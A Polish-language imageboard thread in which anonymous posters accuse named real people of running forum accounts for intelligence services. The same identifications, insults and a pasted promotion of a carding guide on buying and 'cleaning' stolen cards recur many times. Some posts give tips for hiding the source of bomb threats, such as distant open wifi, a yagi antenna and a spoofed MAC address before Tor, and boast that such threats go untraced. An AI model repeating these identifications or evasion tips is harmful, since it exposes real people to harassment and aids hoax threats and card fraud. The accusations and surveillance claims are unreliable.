konta służb = hiretoshinkamura, Vegeta, rozalka, ncuxonama, Moskwa, Maciek, Tworzywo, Bastet

Krang = Adam Golański

R.V.Miller = Piotr Konieczny

v1ewer = Adam Haertle

kubuspuchatek = Adam Lange


 No.33344

>>33342

Ty jesteś dezinforamtor służby

>nagłaśniając że kubuspuchatek to Adam Lange anon terrorysta szkodzi Vegecie.

W jaki sposób?


 No.33346

>>33344

>W jaki sposób?

teraz ludzie wiedzą że Vegeta to pracownik służb a Kubuspuchatek to nie policjant


 No.33349

File: 1592837870969.png (77.71 KB, 887x546, 887:546, miller.png)

rv miller policyjna kurwa

tak teraz wiemy już


 No.33354

>>33349

R.V.Miller to Piotr Konieczny

hiretoshinkamura to Łukasz Jędrzejczak z SKW


 No.33355

rv miller policyjna kurwa

tak teraz wiemy już


 No.33356

Sprofilował się sam. Policjant co się za Piotra Konieczniego podaje. Kurwa policyjna.

https://lolifox.cc/poland/src/1592837870969.png


 No.33357

>>33356

>hxxps://lolifox.cc/poland/src/1592837870969.png

ty wchodzisz przez domenę clearnetową głupku?


 No.33372

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

dziewczyny nie gryzcie sie xDDDDDD

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl7xBLhfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJZDzAP/W4z6oCeKaedZs+pz+th1iqIuCS+8xDIgbAOEzPZJeDCAtg5cWbp6jdoj

s0mctqjJgfgG+mNI0FrAVEPpyPlzooJuiRDSPpphaqEaupqLuszKfrruEKQh0baL

gQ4cycu6F9EOj7VdRuG0BZklYxGKv2Jo3sMbDcoNOrOtdREJbBE=

=zlTz

—–END PGP SIGNATURE—–


 No.33375

>>33372

dziewczyny? a to Rozalia pisała te twoje wpisy Vegeta? niezłe macie tam zabawy pedałki


 No.33382

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

naajak?

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl7xCNVfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJan2wP/WVx8QLNlUCr7KPRtqjgu0rQHp7Ddn1IieSmPawMA/BjzYElkGiS6qe5Y

kQuDNue0RqQ7FK0Rci5ZSsQh3LwUz2azao3kzT2KIYN9pz2dbI8K6vgZXxnn3lzI

37uVs7mORwP6hf2qm9QxdVTwCxhW+DPPvG4nifeA19882kELlto=

=QF/5

—–END PGP SIGNATURE—–


 No.34322

>A w poradniku taka perełka:

>>wchodzisz w zakladke System i w podmenu Motherboard zaznaczasz Enable I/O APIC oraz Hardware Clock In UTC Time

>Umożliwienie deanonimizacji poprzez atak przez rejestr RDTSC

>Piękne. Trojan konfiguracyjny w postaci instrukcji w TXT. Niewykrywalny przez żadnego antywirusa. Nierozpoznawalny przez żadnego "bojownika". Lol.

Jestem piekielnie zainteresowany genezą tego wpisu. Mogą być dwie opcje:

Opcja 1: columbus to funkcjonariusz który celowo i w pełni świadomie ukrył taki zonk.

Opcja 2: columbus faktycznie używa tego ustawienia. Zapewne zrobił tak, bo ktoś mu tak powiedział, tej osobie powiedziała następna i tak dalej, aż do funkcjonariusza który puścił tą "wskazówkę" w obieg. Ciekawe kim jest :)


 No.34324

>aż do funkcjonariusza który puścił tą "wskazówkę" w obieg. Ciekawe kim jest :)

Ciekawsze jest to, jakie jeszcze porady i wskazówki są zatrute.


 No.34325

Piotr pojęcie ma tylko teoretyczne. Nie jest praktykiem. Nie wie jak pewne rzeczy dokonfigurować i użyć.


 No.34334

>>31795

>Umożliwienie deanonimizacji poprzez atak przez rejestr RDTSC

co ty człowieku pierdolisz

polskie służby myślą że VPN to szyfrowany komunikator, a phishing to używanie złośliwego oprogramowania

jaki kurwa rejestr RDTSC w polskich służbach, odklejeńcu

>>34322

>Jestem piekielnie zainteresowany genezą tego wpisu. Mogą być dwie opcje:

>Opcja 1: columbus to funkcjonariusz który celowo i w pełni świadomie ukrył taki zonk.

>Opcja 2: columbus faktycznie używa tego ustawienia. Zapewne zrobił tak, bo ktoś mu tak powiedział, tej osobie powiedziała następna i tak dalej, aż do funkcjonariusza który puścił tą "wskazówkę" w obieg. Ciekawe kim jest :)

zgrywasz się albo nie znasz życia, walikoniu

Opcja 3, prawdziwa: columbus to głupek clearnetowy który tego Virtualboxa, Tailsa i Whoera czy tam Whonixa widział tylko na obrazku. nie zrobił ani jednej wyjebki przez Tor. wpadł na pomysł że dobrym sposobem na zarobienie pieniążków będzie sprzedawanie "poradnika" innym głupkom clearnetowym. głupkom którzy wpłacili mu pieniążki wysyłał jakieś gówno z bełkotem wymyślonym na podstawie tego co zobaczył na obrazkach z Virtualboxem, Sandboxie i Paypalem

>>34324

>Ciekawsze jest to, jakie jeszcze porady i wskazówki są zatrute.

każda "porada" Łukasza Jędrzejczaka z SKW która ma na celu zastraszyć ludzi i zmniejszyć ilość alarmów bombowych w polsce

>>34325

>Piotr pojęcie ma tylko teoretyczne.

Piotr Konieczny to R.V.Miller

>Nie wie jak pewne rzeczy dokonfigurować i użyć.

za to autor tego posta, Vegeta, ma duże doświadczenie praktyczne w "dekonfiguracji nastawów Whonixa"


 No.34335

>>34334

Widać że rok szkolny się wam skończył :))))


 No.34341

>padł na pomysł że dobrym sposobem na zarobienie pieniążków będzie sprzedawanie "poradnika" innym głupkom clearnetowym. głupkom którzy wpłacili mu pieniążki wysyłał jakieś gówno z bełkotem wymyślonym na podstawie tego co zobaczył na obrazkach z Virtualboxem, Sandboxie i Paypalem

Krang miewa różne głupie pomysły ;) "poradnik" o cc to najlepsza rzecz jaką spłodził Piotrek za czasów swojej kariery w torze.


 No.34343

>>34341

>Krang miewa różne głupie pomysły ;) "poradnik" o cc to najlepsza rzecz jaką spłodził Piotrek za czasów swojej kariery w torze.

Krang to Adam Golański

nie miewa głupich pomysłów. jest głupkiem, cwelem, śmieciem. a ty Vegeta jeszcze niedawno lizałeś mu dupę

Piotr Konieczny to R.V.Miller


 No.34352

>>34343

Sam jesteś Vegeta ;)


 No.34364

>wpadł na pomysł że dobrym sposobem na zarobienie pieniążków będzie sprzedawanie "poradnika" innym głupkom clearnetowym.

ciekawe:

2017-04-30 7576 1 kubuspuchatek » columbusjr Plus

2017-04-29 7540 1 kubuspuchatek » columbusjr Plus

2017-06-08 8866 1 kubuspuchatek » columbusjr Plus

2017-06-21 9271 2 columbusjr » kubuspuchatek Plus

2017-08-27 11525 3 kubuspuchatek » columbusjr Plus

2017-08-30 11660 1 kubuspuchatek » columbusjr Plus

2017-08-30 11017 1 columbusjr » kubuspuchatek Plus

2017-09-03 11864 8 kubuspuchatek » columbusjr Plus

2017-10-06 13098 1 kubuspuchatek » columbusjr Plus

2017-09-18 12420 3 kubuspuchatek » columbusjr Plus

2017-11-17 14420 1 kubuspuchatek » columbusjr Plus

2017-11-17 14381 3 columbusjr » kubuspuchatek Plus

2017-11-08 14115 1 kubuspuchatek » columbusjr Plus

2017-10-25 13848 1 kubuspuchatek » columbusjr Plus

2017-10-14 13407 1 kubuspuchatek » columbusjr Plus

2018-01-17 15436 1 kubuspuchatek » columbusjr Plus

2019-03-28 25736 2 kubuspuchatek » columbusjr Plus

2019-10-07 34925 0 kubuspuchatek » columbusjr Plus

2019-10-09 35044 0 kubuspuchatek » columbusjr Plus

2019-10-12 35093 1 kubuspuchatek » columbusjr Plus

2017-05-18 6834 4 columbusjr » krang Plus

2017-10-11 13094 1 columbusjr » krang Plus

2017-12-15 15549 1 columbusjr » krang Plus

2017-12-12 15411 1 krang » columbusjr Plus

2018-01-08 16174 1 krang » columbusjr Plus

2017-12-18 15358 2 krang » columbusjr Plus

2018-03-26 18467 1 columbusjr » krang Plus

2018-03-25 18464 1 krang » columbusjr Plus

http://cebulka7millweap.onion/viewtopic.php?id=6611

http://cebulka7millweap.onion/viewtopic.php?id=8216

R.V.Miller wrote:

>W poradniku są informacje gdzie kupic karty i w jaki sposob je wyczyscic ale brakuje 5 magicznych miejsc w ktore nalezy kliknac i columbusa ktory spelni 3 zyczenia.

Mam kolege ktory z powodzeniem czysci karty na 2 sposoby przedstawione w poradniku. Pewnie macie troche racji. Roznice sa drobne a rozwiazania banalne.

Poza tym carding to nie wszystko. W poradniku jest wiele dodatkowych informacji. Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.

Cena jest niska. Wartosc wiedzy wysoka.

Uwaga! :

>Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka.

>Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.


 No.34365

otwarte wifi z restauracji 3km dalej za pomocą yagi i karty ze zmienionym mac adressem (clearnet) -> tor

taka prosta kombinacja a rozpierdala wszystkie wasze netflow i inne analizy ruchu na kiju i inne sposoby na deanonimizacje xDD

Nawet kurwa, LAE TO NAWET KURWA jak jakimś jebanym cudem namierzą nieuważnego bombera to bagiety wpadają do restauracji/siłowni/janusza z otwartym wifi a nie do anona 3km dalej xD


 No.34367

>taka prosta kombinacja a rozpierdala wszystkie wasze netflow i inne analizy ruchu na kiju i inne sposoby na deanonimizacje

Mylisz się. Każda karta sieciowa na świecie genruje mikroskopijne różnice w timingu sygnałów sprzętowych budujących pakiety sieciowe. Te timingi to forma steganograficznego przekazywania ukrytego odpowiednika adresu MAC, oraz innych informacji o komputerze-hoście.


 No.34369

>>34365

>otwarte wifi z restauracji 3km dalej za pomocą yagi i karty ze zmienionym mac adressem (clearnet) -> tor

żadne otwarte wifi i karty policyjny głupku

>taka prosta kombinacja a rozpierdala wszystkie wasze netflow i inne analizy ruchu na kiju i inne sposoby na deanonimizacje xDD

sam Tor Browser wystarczy

>jak jakimś jebanym cudem namierzą nieuważnego bombera

nie namierzą


 No.34370

>>34364

kubuspuchatek to Adam Lange

R.V.Miller to Piotr Konieczny

>>34365

>otwarte wifi z restauracji 3km dalej za pomocą yagi i karty ze zmienionym mac adressem (clearnet) -> tor

>taka prosta kombinacja a rozpierdala wszystkie wasze netflow i inne analizy ruchu na kiju i inne sposoby na deanonimizacje xDD

>Nawet kurwa, LAE TO NAWET KURWA jak jakimś jebanym cudem namierzą nieuważnego bombera to bagiety wpadają do restauracji/siłowni/janusza z otwartym wifi a nie do anona 3km dalej xD

mam nadzieję że nikt się nie nabierze na tego kretyna

>>34367

>Mylisz się. Każda karta sieciowa na świecie genruje mikroskopijne różnice w timingu sygnałów sprzętowych budujących pakiety sieciowe. Te timingi to forma steganograficznego przekazywania ukrytego odpowiednika adresu MAC, oraz innych informacji o komputerze-hoście.

nie słuchać śmiecia Łukasza Jędrzejczaka z SKW


 No.34371

>>Mylisz się. Każda karta sieciowa na świecie genruje mikroskopijne różnice w timingu sygnałów sprzętowych budujących pakiety sieciowe. Te timingi to forma steganograficznego przekazywania ukrytego odpowiednika adresu MAC, oraz innych informacji o komputerze-hoście.

>nie słuchać śmiecia Łukasza Jędrzejczaka z SKW

Nie słuchać ćpuna, podwórkowego socjopaty, który próbuje narażać WASZE życie i niszczyć WASZĄ przyszłość by rozgrywać swoje prywatne wojenki WASZYMI rękoma.


 No.34374

Polski nastolatek za Torem sądzi, że służby potrafią namierzyć kogoś po tym, że mieszka w wieżowcu

Polski nastolatek za Torem sądzi, że służby nie potrafią umieścić filtra w NetIXie/Giganecie logującym połączenia z węzłami Tor


 No.34376

>wpadł na pomysł że dobrym sposobem na zarobienie pieniążków będzie sprzedawanie "poradnika" innym głupkom clearnetowym.

ciekawe:

2017-04-30 7576 1 kubuspuchatek » columbusjr Plus

2017-04-29 7540 1 kubuspuchatek » columbusjr Plus

2017-06-08 8866 1 kubuspuchatek » columbusjr Plus

2017-06-21 9271 2 columbusjr » kubuspuchatek Plus

2017-08-27 11525 3 kubuspuchatek » columbusjr Plus

2017-08-30 11660 1 kubuspuchatek » columbusjr Plus

2017-08-30 11017 1 columbusjr » kubuspuchatek Plus

2017-09-03 11864 8 kubuspuchatek » columbusjr Plus

2017-10-06 13098 1 kubuspuchatek » columbusjr Plus

2017-09-18 12420 3 kubuspuchatek » columbusjr Plus

2017-11-17 14420 1 kubuspuchatek » columbusjr Plus

2017-11-17 14381 3 columbusjr » kubuspuchatek Plus

2017-11-08 14115 1 kubuspuchatek » columbusjr Plus

2017-10-25 13848 1 kubuspuchatek » columbusjr Plus

2017-10-14 13407 1 kubuspuchatek » columbusjr Plus

2018-01-17 15436 1 kubuspuchatek » columbusjr Plus

2019-03-28 25736 2 kubuspuchatek » columbusjr Plus

2019-10-07 34925 0 kubuspuchatek » columbusjr Plus

2019-10-09 35044 0 kubuspuchatek » columbusjr Plus

2019-10-12 35093 1 kubuspuchatek » columbusjr Plus

2017-05-18 6834 4 columbusjr » krang Plus

2017-10-11 13094 1 columbusjr » krang Plus

2017-12-15 15549 1 columbusjr » krang Plus

2017-12-12 15411 1 krang » columbusjr Plus

2018-01-08 16174 1 krang » columbusjr Plus

2017-12-18 15358 2 krang » columbusjr Plus

2018-03-26 18467 1 columbusjr » krang Plus

2018-03-25 18464 1 krang » columbusjr Plus

http://cebulka7millweap.onion/viewtopic.php?id=6611

http://cebulka7millweap.onion/viewtopic.php?id=8216

R.V.Miller wrote:

>W poradniku są informacje gdzie kupic karty i w jaki sposob je wyczyscic ale brakuje 5 magicznych miejsc w ktore nalezy kliknac i columbusa ktory spelni 3 zyczenia.

Mam kolege ktory z powodzeniem czysci karty na 2 sposoby przedstawione w poradniku. Pewnie macie troche racji. Roznice sa drobne a rozwiazania banalne.

Poza tym carding to nie wszystko. W poradniku jest wiele dodatkowych informacji. Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.

Cena jest niska. Wartosc wiedzy wysoka.

Uwaga! :

>Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka.

>Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.


 No.34377

>Polski nastolatek za Torem sądzi, że służby nie potrafią umieścić filtra w NetIXie/Giganecie logującym połączenia z węzłami Tor

Bo to głupek i niedorozwój bez żadnej realnej wiedzy. Nie zna nawet architektury sieci rozległych i nie ma pojęcia o skali i możliwościach analizy ruchu.


 No.34378

>>34374

>Polski nastolatek za Torem sądzi, że służby potrafią namierzyć kogoś po tym, że mieszka w wieżowcu

popierdoliło cię?

polskie służby to głupki kompletne, kretyni jeszcze więksi niż nam się wydaje, nic nie potrafią namierzyć

nie zmienia to faktu że ujawnianie informacji gdzie się mieszka to bycie głupkiem xD


 No.34379

>wpadł na pomysł że dobrym sposobem na zarobienie pieniążków będzie sprzedawanie "poradnika" innym głupkom clearnetowym.

ciekawe:

2017-04-30 7576 1 kubuspuchatek » columbusjr Plus

2017-04-29 7540 1 kubuspuchatek » columbusjr Plus

2017-06-08 8866 1 kubuspuchatek » columbusjr Plus

2017-06-21 9271 2 columbusjr » kubuspuchatek Plus

2017-08-27 11525 3 kubuspuchatek » columbusjr Plus

2017-08-30 11660 1 kubuspuchatek » columbusjr Plus

2017-08-30 11017 1 columbusjr » kubuspuchatek Plus

2017-09-03 11864 8 kubuspuchatek » columbusjr Plus

2017-10-06 13098 1 kubuspuchatek » columbusjr Plus

2017-09-18 12420 3 kubuspuchatek » columbusjr Plus

2017-11-17 14420 1 kubuspuchatek » columbusjr Plus

2017-11-17 14381 3 columbusjr » kubuspuchatek Plus

2017-11-08 14115 1 kubuspuchatek » columbusjr Plus

2017-10-25 13848 1 kubuspuchatek » columbusjr Plus

2017-10-14 13407 1 kubuspuchatek » columbusjr Plus

2018-01-17 15436 1 kubuspuchatek » columbusjr Plus

2019-03-28 25736 2 kubuspuchatek » columbusjr Plus

2019-10-07 34925 0 kubuspuchatek » columbusjr Plus

2019-10-09 35044 0 kubuspuchatek » columbusjr Plus

2019-10-12 35093 1 kubuspuchatek » columbusjr Plus

2017-05-18 6834 4 columbusjr » krang Plus

2017-10-11 13094 1 columbusjr » krang Plus

2017-12-15 15549 1 columbusjr » krang Plus

2017-12-12 15411 1 krang » columbusjr Plus

2018-01-08 16174 1 krang » columbusjr Plus

2017-12-18 15358 2 krang » columbusjr Plus

2018-03-26 18467 1 columbusjr » krang Plus

2018-03-25 18464 1 krang » columbusjr Plus

http://cebulka7millweap.onion/viewtopic.php?id=6611

http://cebulka7millweap.onion/viewtopic.php?id=8216

R.V.Miller wrote:

>W poradniku są informacje gdzie kupic karty i w jaki sposob je wyczyscic ale brakuje 5 magicznych miejsc w ktore nalezy kliknac i columbusa ktory spelni 3 zyczenia.

Mam kolege ktory z powodzeniem czysci karty na 2 sposoby przedstawione w poradniku. Pewnie macie troche racji. Roznice sa drobne a rozwiazania banalne.

Poza tym carding to nie wszystko. W poradniku jest wiele dodatkowych informacji. Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.

Cena jest niska. Wartosc wiedzy wysoka.

Uwaga! :

>Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka.

>Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.


 No.34380

>>34374

>Polski nastolatek za Torem sądzi, że służby potrafią namierzyć kogoś po tym, że mieszka w wieżowcu

popierdoliło cię?

polskie służby to głupki kompletne, kretyni jeszcze więksi niż nam się wydaje, nic nie potrafią namierzyć

nie zmienia to faktu że ujawnianie informacji gdzie się mieszka to bycie głupkiem xD

>>34374

>Polski nastolatek za Torem sądzi, że służby nie potrafią umieścić filtra w NetIXie/Giganecie logującym połączenia z węzłami Tor

tak sądzi Adam Haertle, ty cwelu

Dobre fantazje. Nikt nie monitoruje ruchu sieciowego Polaków, ani służby, ani operatorzy. Nie ma do tego narzędzi, sprzętu, ludzi, o przepisach nie wspominając. Koszty są ogromne i nikt nie chce płacić ;)

Ja wiem bo się tym zajmowałem zawodowo przez 12 lat. Służby nie mają żadnego bezpośredniego dostępu do treści ruchu.


 No.34381

>>34379

kubuspuchatek to Adam Lange

R.V.Miller to Piotr Konieczny


 No.34383

>tak sądzi Adam Haertle, ty cwelu

Tak pisze Adam, bo mu każą kłamać i dezinformować.

Przypominam, skoro masz pamięć złotej rybki:

1. Ustawa o retencji - logi zwykłe dostawcy, kopiowane realtime do służb.

2. Ustawa o telekomunikacji, dane "telemetryczne" i "jakościowe" czyli obwiednie rejestrowane przez dostawców szkieletowych, w czasie rzeczywistym kopiowane do służb.

3. "Wieczne" logi wytworzone z logów z punktu 1 i 2 przez prostą operację typu "znajdź/zamień" która sprawia magicznie, że output przestaje podlegać nudnym przepisom o kasowaniu i innym przeszkadzającym bzdurom.

Wszystko jasne?

Dowód na to, że policja szkoli się z używanych przez siebie systemów monitorowania i analizy ruchu sieciowego:

http://bip.mazowiecka.policja.gov.pl/download/40/81859/Ogloudzielzamowds.pdf


 No.34385

>>34383

>Tak pisze Adam, bo mu każą kłamać i dezinformować.

przetestowano jego słowa wysyłając kilkanaście tysięcy alarmów bombowych

>Dowód na to, że policja szkoli się z używanych przez siebie systemów monitorowania i analizy ruchu sieciowego:

szkolenie z wiresharka pomogło?


 No.34388

>przetestowano jego słowa wysyłając kilkanaście tysięcy alarmów bombowych

Wszystkie namierzone i poprawnie przypisane do stazystów GRU z Sankt Petersburga. Kilka wysłanych przez polskich gówniarzy też namierzonych, gówniarze odwiedzeni przez służby, nuż nigdy w zyciu nie włączą Tor Browser.


 No.34393

>wpadł na pomysł że dobrym sposobem na zarobienie pieniążków będzie sprzedawanie "poradnika" innym głupkom clearnetowym.

ciekawe:

2017-04-30 7576 1 kubuspuchatek » columbusjr Plus

2017-04-29 7540 1 kubuspuchatek » columbusjr Plus

2017-06-08 8866 1 kubuspuchatek » columbusjr Plus

2017-06-21 9271 2 columbusjr » kubuspuchatek Plus

2017-08-27 11525 3 kubuspuchatek » columbusjr Plus

2017-08-30 11660 1 kubuspuchatek » columbusjr Plus

2017-08-30 11017 1 columbusjr » kubuspuchatek Plus

2017-09-03 11864 8 kubuspuchatek » columbusjr Plus

2017-10-06 13098 1 kubuspuchatek » columbusjr Plus

2017-09-18 12420 3 kubuspuchatek » columbusjr Plus

2017-11-17 14420 1 kubuspuchatek » columbusjr Plus

2017-11-17 14381 3 columbusjr » kubuspuchatek Plus

2017-11-08 14115 1 kubuspuchatek » columbusjr Plus

2017-10-25 13848 1 kubuspuchatek » columbusjr Plus

2017-10-14 13407 1 kubuspuchatek » columbusjr Plus

2018-01-17 15436 1 kubuspuchatek » columbusjr Plus

2019-03-28 25736 2 kubuspuchatek » columbusjr Plus

2019-10-07 34925 0 kubuspuchatek » columbusjr Plus

2019-10-09 35044 0 kubuspuchatek » columbusjr Plus

2019-10-12 35093 1 kubuspuchatek » columbusjr Plus

2017-05-18 6834 4 columbusjr » krang Plus

2017-10-11 13094 1 columbusjr » krang Plus

2017-12-15 15549 1 columbusjr » krang Plus

2017-12-12 15411 1 krang » columbusjr Plus

2018-01-08 16174 1 krang » columbusjr Plus

2017-12-18 15358 2 krang » columbusjr Plus

2018-03-26 18467 1 columbusjr » krang Plus

2018-03-25 18464 1 krang » columbusjr Plus

http://cebulka7millweap.onion/viewtopic.php?id=6611

http://cebulka7millweap.onion/viewtopic.php?id=8216

R.V.Miller wrote:

>W poradniku są informacje gdzie kupic karty i w jaki sposob je wyczyscic ale brakuje 5 magicznych miejsc w ktore nalezy kliknac i columbusa ktory spelni 3 zyczenia.

Mam kolege ktory z powodzeniem czysci karty na 2 sposoby przedstawione w poradniku. Pewnie macie troche racji. Roznice sa drobne a rozwiazania banalne.

Poza tym carding to nie wszystko. W poradniku jest wiele dodatkowych informacji. Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.

Cena jest niska. Wartosc wiedzy wysoka.

Uwaga! :

>Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka.

>Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.


 No.34396

>>34393

kubuspuchatek to Adam Lange

R.V.Miller to Piotr Konieczny


 No.34399

>wpadł na pomysł że dobrym sposobem na zarobienie pieniążków będzie sprzedawanie "poradnika" innym głupkom clearnetowym.

ciekawe:

2017-04-30 7576 1 kubuspuchatek » columbusjr Plus

2017-04-29 7540 1 kubuspuchatek » columbusjr Plus

2017-06-08 8866 1 kubuspuchatek » columbusjr Plus

2017-06-21 9271 2 columbusjr » kubuspuchatek Plus

2017-08-27 11525 3 kubuspuchatek » columbusjr Plus

2017-08-30 11660 1 kubuspuchatek » columbusjr Plus

2017-08-30 11017 1 columbusjr » kubuspuchatek Plus

2017-09-03 11864 8 kubuspuchatek » columbusjr Plus

2017-10-06 13098 1 kubuspuchatek » columbusjr Plus

2017-09-18 12420 3 kubuspuchatek » columbusjr Plus

2017-11-17 14420 1 kubuspuchatek » columbusjr Plus

2017-11-17 14381 3 columbusjr » kubuspuchatek Plus

2017-11-08 14115 1 kubuspuchatek » columbusjr Plus

2017-10-25 13848 1 kubuspuchatek » columbusjr Plus

2017-10-14 13407 1 kubuspuchatek » columbusjr Plus

2018-01-17 15436 1 kubuspuchatek » columbusjr Plus

2019-03-28 25736 2 kubuspuchatek » columbusjr Plus

2019-10-07 34925 0 kubuspuchatek » columbusjr Plus

2019-10-09 35044 0 kubuspuchatek » columbusjr Plus

2019-10-12 35093 1 kubuspuchatek » columbusjr Plus

2017-05-18 6834 4 columbusjr » krang Plus

2017-10-11 13094 1 columbusjr » krang Plus

2017-12-15 15549 1 columbusjr » krang Plus

2017-12-12 15411 1 krang » columbusjr Plus

2018-01-08 16174 1 krang » columbusjr Plus

2017-12-18 15358 2 krang » columbusjr Plus

2018-03-26 18467 1 columbusjr » krang Plus

2018-03-25 18464 1 krang » columbusjr Plus

http://cebulka7millweap.onion/viewtopic.php?id=6611

http://cebulka7millweap.onion/viewtopic.php?id=8216

R.V.Miller wrote:

>W poradniku są informacje gdzie kupic karty i w jaki sposob je wyczyscic ale brakuje 5 magicznych miejsc w ktore nalezy kliknac i columbusa ktory spelni 3 zyczenia.

Mam kolege ktory z powodzeniem czysci karty na 2 sposoby przedstawione w poradniku. Pewnie macie troche racji. Roznice sa drobne a rozwiazania banalne.

Poza tym carding to nie wszystko. W poradniku jest wiele dodatkowych informacji. Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.

Cena jest niska. Wartosc wiedzy wysoka.

Uwaga! :

>Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka. Wartosc wiedzy wysoka.

>Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.

>r.v.miller policyjny profiler, etatowiec


 No.34401

>>34399

kubuspuchatek to Adam Lange

R.V.Miller to Piotr Konieczny

bawisz się w zabawę kto pierwszy odpuści?


 No.34403

POLSKI NASTOLATEK ZA TOREM USIŁUJE DYWERTOWAĆ FORUM POPRZEZ SPAM


 No.34406

>>34403

>POLSKI NASTOLATEK ZA TOREM

ciekawe nazwa na kurwę SKW o pseudonimie Vegeta


 No.34417

File: 1593186041952.png (56.98 KB, 889x479, 889:479, carding.png)

>Poza tym carding to nie wszystko. W poradniku jest wiele dodatkowych informacji. Zakup tego poradnika dla kogos kto zaczyna przygode z torem bedzie jak podroz w czasie z ciemnego sredniowiecza do wspolczesnosci.

>Cena jest niska. Wartosc wiedzy wysoka.


 No.34419

>>34417

kubuspuchatek to Adam Lange

R.V.Miller to Piotr Konieczny

będzie to pod każdym twoim wpisem dezinformującym na tym forum


 No.35446

przewidywalne głupki


 No.35535

4


 No.35699

20


 No.35916

18


 No.36243

hahah głupkom się nie udało 17


 No.36857

SKW - głupki, nieudacznicy, największa kompromitacja w europie. nie potrafią nawet zepchnąć tematów 16


 No.39556

15. WYWOŁYWANIE DYSKUSJI W CELU PODBIJANIA TEMATÓW ZAŁOŻONYCH PRZEZ SŁUŻBY

MODUS OPERANDI: w tematach założonych przez służby na przykład "Vegeta to xArm" albo "NordVPN jest super" operatorzy służb prowokują dyskusję, na przykład pisząc że trzeba wprowadzić modyfikacje do Tor Browser. ich posty są zawsze bez SAGE! dlatego temat wraca na stronę główną, w nadziei że jakiś głupek przeczyta tylko OP

OCENA: 5/10 z jednej strony to pomysłowa i skuteczna metoda, ale zawsze kończy się zmasakrowaniem głupków ze służb i wyśmianiem ich idiotyzmów


 No.39971

Beata Legowicz znana jako lafirynda z NATO nie potrafi samodzielnie obsługiwać komputera 89


 No.41695

>>31740

lmao takie zajęcia to kurwa poradnik na YT


 No.41714

>>41695

>lmao takie zajęcia to kurwa poradnik na YT

Dobre fantazje. Nikt nie monitoruje ruchu sieciowego Polaków, ani służby, ani operatorzy. Nie ma do tego narzędzi, sprzętu, ludzi, o przepisach nie wspominając. Koszty są ogromne i nikt nie chce płacić ;)

Ja wiem bo się tym zajmowałem zawodowo przez 12 lat. Służby nie mają żadnego bezpośredniego dostępu do treści ruchu.




[Return][Go to top][Catalog][Post a Reply]
Delete Post [ ]
[]
[ Home / Boards / Banlist / Search / Login / Tor mirror / Overboard / Create / Wiki (BETA) ]
Top threads